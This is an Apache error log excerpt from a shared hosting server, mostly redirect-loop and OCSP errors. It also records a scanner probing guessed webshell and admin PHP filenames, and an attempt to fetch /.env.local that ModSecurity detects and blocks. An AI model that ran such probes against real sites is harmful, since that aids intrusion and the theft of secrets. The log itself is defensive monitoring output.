[Mon May 11 14:07:20.735141 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/mar.php
[Mon May 11 14:07:21.222718 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/admin.php
[Mon May 11 14:07:21.540202 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/wp-p2r3q9c8k4.php
[Mon May 11 14:07:21.698697 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/7.php
[Mon May 11 14:07:22.338864 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/adminer.php
[Mon May 11 14:07:22.497187 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/wp-signup.php
[Mon May 11 14:07:22.803700 2026] [core:error] [pid 1319998:tid 1320021] [client 52.242.216.199:59541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:22.803733 2026] [core:error] [pid 1319998:tid 1320021] [client 52.242.216.199:59541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:22.993646 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/wp-admin.php
[Mon May 11 14:07:23.474276 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/install.php
[Mon May 11 14:07:23.654089 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/ahax.php
[Mon May 11 14:07:24.458862 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/wp-content.php
[Mon May 11 14:07:24.617074 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/we.php
[Mon May 11 14:07:25.096085 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/deepseek_d.php
[Mon May 11 14:07:25.254106 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/cache.php
[Mon May 11 14:07:25.508293 2026] [core:error] [pid 1319998:tid 1320010] [client 52.242.216.199:59598] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:25.508331 2026] [core:error] [pid 1319998:tid 1320010] [client 52.242.216.199:59598] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:25.887537 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/text.php
[Mon May 11 14:07:26.045868 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/gecko.php
[Mon May 11 14:07:26.363443 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/.well-known/index.php
[Mon May 11 14:07:26.521582 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/temp.php
[Mon May 11 14:07:26.679721 2026] [:error] [pid 1320398:tid 1320409] [client 4.193.121.6:3592] File does not exist: /home/piregwan/public_html/backup.php
[Mon May 11 14:07:27.725351 2026] [security2:error] [pid 1319886:tid 1319926] [client 49.51.253.83:40076] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agHGf6y-5-wpj6Sx56aAaAAAABE"]
[Mon May 11 14:07:28.053814 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:59644] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:28.053851 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:59644] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:30.278519 2026] [core:error] [pid 1319885:tid 1319889] [client 52.242.216.199:59588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:30.278557 2026] [core:error] [pid 1319885:tid 1319889] [client 52.242.216.199:59588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:30.899753 2026] [security2:error] [pid 1320398:tid 1320410] [client 49.51.253.83:51948] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agHGguJEyNRN152ArORylgAAAEo"], referer: http://rentparadise.fr
[Mon May 11 14:07:33.217349 2026] [core:error] [pid 1320674:tid 1320706] [client 52.242.216.199:59548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:33.217376 2026] [core:error] [pid 1320674:tid 1320706] [client 52.242.216.199:59548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:35.659896 2026] [core:error] [pid 1319953:tid 1319975] [client 52.242.216.199:59640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:35.659930 2026] [core:error] [pid 1319953:tid 1319975] [client 52.242.216.199:59640] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:37.267793 2026] [core:error] [pid 1320674:tid 1320701] [client 52.242.216.199:59615] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:37.267831 2026] [core:error] [pid 1320674:tid 1320701] [client 52.242.216.199:59615] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:38.782865 2026] [core:error] [pid 1319885:tid 1319925] [client 52.242.216.199:59604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:38.782901 2026] [core:error] [pid 1319885:tid 1319925] [client 52.242.216.199:59604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:40.592375 2026] [core:error] [pid 1319953:tid 1319976] [client 52.242.216.199:59630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:40.592408 2026] [core:error] [pid 1319953:tid 1319976] [client 52.242.216.199:59630] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:43.985321 2026] [core:error] [pid 1319885:tid 1319893] [client 52.242.216.199:21710] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:43.985351 2026] [core:error] [pid 1319885:tid 1319893] [client 52.242.216.199:21710] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:46.085442 2026] [core:error] [pid 1319885:tid 1319910] [client 52.242.216.199:59550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:46.085469 2026] [core:error] [pid 1319885:tid 1319910] [client 52.242.216.199:59550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:48.890103 2026] [core:error] [pid 1319998:tid 1320000] [client 52.242.216.199:59636] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:48.890241 2026] [core:error] [pid 1319998:tid 1320000] [client 52.242.216.199:59636] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:51.059470 2026] [core:error] [pid 1319998:tid 1320013] [client 52.242.216.199:59572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:51.059499 2026] [core:error] [pid 1319998:tid 1320013] [client 52.242.216.199:59572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:53.454039 2026] [core:error] [pid 1320674:tid 1320694] [client 52.242.216.199:59618] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:53.454077 2026] [core:error] [pid 1320674:tid 1320694] [client 52.242.216.199:59618] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:56.338063 2026] [core:error] [pid 1319998:tid 1320006] [client 52.242.216.199:59586] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:56.338098 2026] [core:error] [pid 1319998:tid 1320006] [client 52.242.216.199:59586] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:58.287484 2026] [core:error] [pid 1319885:tid 1319935] [client 52.242.216.199:59544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:58.287600 2026] [core:error] [pid 1319885:tid 1319935] [client 52.242.216.199:59544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:59.114511 2026] [core:error] [pid 1320674:tid 1320693] [client 52.242.216.199:59530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:07:59.114545 2026] [core:error] [pid 1320674:tid 1320693] [client 52.242.216.199:59530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:00.646397 2026] [core:error] [pid 1319885:tid 1319918] [client 52.242.216.199:59527] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:00.646423 2026] [core:error] [pid 1319885:tid 1319918] [client 52.242.216.199:59527] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:02.822235 2026] [core:error] [pid 1319885:tid 1319930] [client 52.242.216.199:59554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:02.822361 2026] [core:error] [pid 1319885:tid 1319930] [client 52.242.216.199:59554] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:04.703046 2026] [core:error] [pid 1319953:tid 1319965] [client 52.242.216.199:59627] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:04.703194 2026] [core:error] [pid 1319953:tid 1319965] [client 52.242.216.199:59627] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:07.367506 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:59528] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:07.367538 2026] [core:error] [pid 1320398:tid 1320411] [client 52.242.216.199:59528] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:09.284978 2026] [core:error] [pid 1319998:tid 1320002] [client 52.242.216.199:21739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:09.285014 2026] [core:error] [pid 1319998:tid 1320002] [client 52.242.216.199:21739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:11.062945 2026] [core:error] [pid 1319886:tid 1319929] [client 52.242.216.199:59539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:11.063560 2026] [core:error] [pid 1319886:tid 1319929] [client 52.242.216.199:59539] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:11.889595 2026] [ssl:error] [pid 1319886:tid 1319899] (EAI 2)Name or service not known: [client 64.23.185.8:50032] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:11.889800 2026] [ssl:error] [pid 1319886:tid 1319899] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:12.804808 2026] [core:error] [pid 1320674:tid 1320694] [client 52.242.216.199:59638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:12.804847 2026] [core:error] [pid 1320674:tid 1320694] [client 52.242.216.199:59638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:14.960523 2026] [ssl:error] [pid 1320674:tid 1320703] (EAI 2)Name or service not known: [client 161.123.235.48:46115] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:14.960559 2026] [ssl:error] [pid 1320674:tid 1320703] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:16.293709 2026] [core:error] [pid 1319885:tid 1319915] [client 52.242.216.199:59614] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:16.293830 2026] [core:error] [pid 1319885:tid 1319915] [client 52.242.216.199:59614] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:18.615433 2026] [core:error] [pid 1320674:tid 1320691] [client 52.242.216.199:59531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:18.615680 2026] [core:error] [pid 1320674:tid 1320691] [client 52.242.216.199:59531] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:19.151963 2026] [core:error] [pid 1319886:tid 1319928] [client 52.242.216.199:59561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:19.151998 2026] [core:error] [pid 1319886:tid 1319928] [client 52.242.216.199:59561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:20.142664 2026] [core:error] [pid 1319953:tid 1319968] [client 52.242.216.199:59524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:20.142874 2026] [core:error] [pid 1319953:tid 1319968] [client 52.242.216.199:59524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:21.643664 2026] [core:error] [pid 1319885:tid 1319896] [client 52.242.216.199:59590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:21.643768 2026] [core:error] [pid 1319885:tid 1319896] [client 52.242.216.199:59590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:21.716301 2026] [ssl:error] [pid 1319953:tid 1319971] (EAI 2)Name or service not known: [client 167.172.203.11:44564] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:21.716350 2026] [ssl:error] [pid 1319953:tid 1319971] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:23.534889 2026] [core:error] [pid 1319885:tid 1319888] [client 52.242.216.199:21729] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:23.535012 2026] [core:error] [pid 1319885:tid 1319888] [client 52.242.216.199:21729] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:23.864794 2026] [ssl:error] [pid 1319998:tid 1320024] (EAI 2)Name or service not known: [client 136.227.173.79:32835] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:23.864829 2026] [ssl:error] [pid 1319998:tid 1320024] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:25.938558 2026] [core:error] [pid 1319998:tid 1320020] [client 52.242.216.199:59629] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:25.938590 2026] [core:error] [pid 1319998:tid 1320020] [client 52.242.216.199:59629] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:28.018645 2026] [ssl:error] [pid 1319953:tid 1319975] (EAI 2)Name or service not known: [client 158.46.130.143:33535] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:28.018686 2026] [ssl:error] [pid 1319953:tid 1319975] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:28.191833 2026] [core:error] [pid 1319886:tid 1319911] [client 52.242.216.199:59538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:28.191941 2026] [core:error] [pid 1319886:tid 1319911] [client 52.242.216.199:59538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:29.913592 2026] [core:error] [pid 1319886:tid 1319913] [client 52.242.216.199:59566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:29.913625 2026] [core:error] [pid 1319886:tid 1319913] [client 52.242.216.199:59566] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:30.413744 2026] [security2:error] [pid 1319953:tid 1319969] [client 176.65.139.168:59012] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "cpc-entreprises.com"] [uri "/.env.local"] [unique_id "agHGvuSQ-m-m0ukSShtqZgAAAU4"]
[Mon May 11 14:08:30.414430 2026] [security2:error] [pid 1319953:tid 1319969] [client 176.65.139.168:59012] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpc-entreprises.com"] [uri "/.env.local"] [unique_id "agHGvuSQ-m-m0ukSShtqZgAAAU4"]
[Mon May 11 14:08:30.415122 2026] [security2:error] [pid 1319953:tid 1319969] [client 176.65.139.168:59012] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "cpc-entreprises.com"] [uri "/.env.local"] [unique_id "agHGvuSQ-m-m0ukSShtqZgAAAU4"]
[Mon May 11 14:08:31.237030 2026] [core:error] [pid 1319885:tid 1319891] [client 52.242.216.199:59596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:31.237067 2026] [core:error] [pid 1319885:tid 1319891] [client 52.242.216.199:59596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:33.111970 2026] [ssl:error] [pid 1319953:tid 1319959] (EAI 2)Name or service not known: [client 157.230.136.26:53562] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:33.112013 2026] [ssl:error] [pid 1319953:tid 1319959] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:33.362700 2026] [core:error] [pid 1320674:tid 1320696] [client 52.242.216.199:59570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:33.362728 2026] [core:error] [pid 1320674:tid 1320696] [client 52.242.216.199:59570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:34.423791 2026] [core:error] [pid 1319953:tid 1319957] [client 52.242.216.199:59525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:34.423815 2026] [core:error] [pid 1319953:tid 1319957] [client 52.242.216.199:59525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:35.292520 2026] [core:error] [pid 1319953:tid 1319958] [client 52.242.216.199:59623] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:35.292549 2026] [core:error] [pid 1319953:tid 1319958] [client 52.242.216.199:59623] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:35.964941 2026] [ssl:error] [pid 1319885:tid 1319893] (EAI 2)Name or service not known: [client 89.38.107.183:36857] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:35.964986 2026] [ssl:error] [pid 1319885:tid 1319893] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:36.790441 2026] [core:error] [pid 1320674:tid 1320691] [client 52.242.216.199:21718] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:36.790477 2026] [core:error] [pid 1320674:tid 1320691] [client 52.242.216.199:21718] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:08:38.463353 2026] [ssl:error] [pid 1319953:tid 1319964] (EAI 2)Name or service not known: [client 185.175.227.229:37983] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 14:08:38.463385 2026] [ssl:error] [pid 1319953:tid 1319964] AH01941: stapling_renew_response: responder error
[Mon May 11 14:08:38.700262 2026] [core:error] [pid 1319886:tid 1319928] [client 52.242.216.199:59534] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
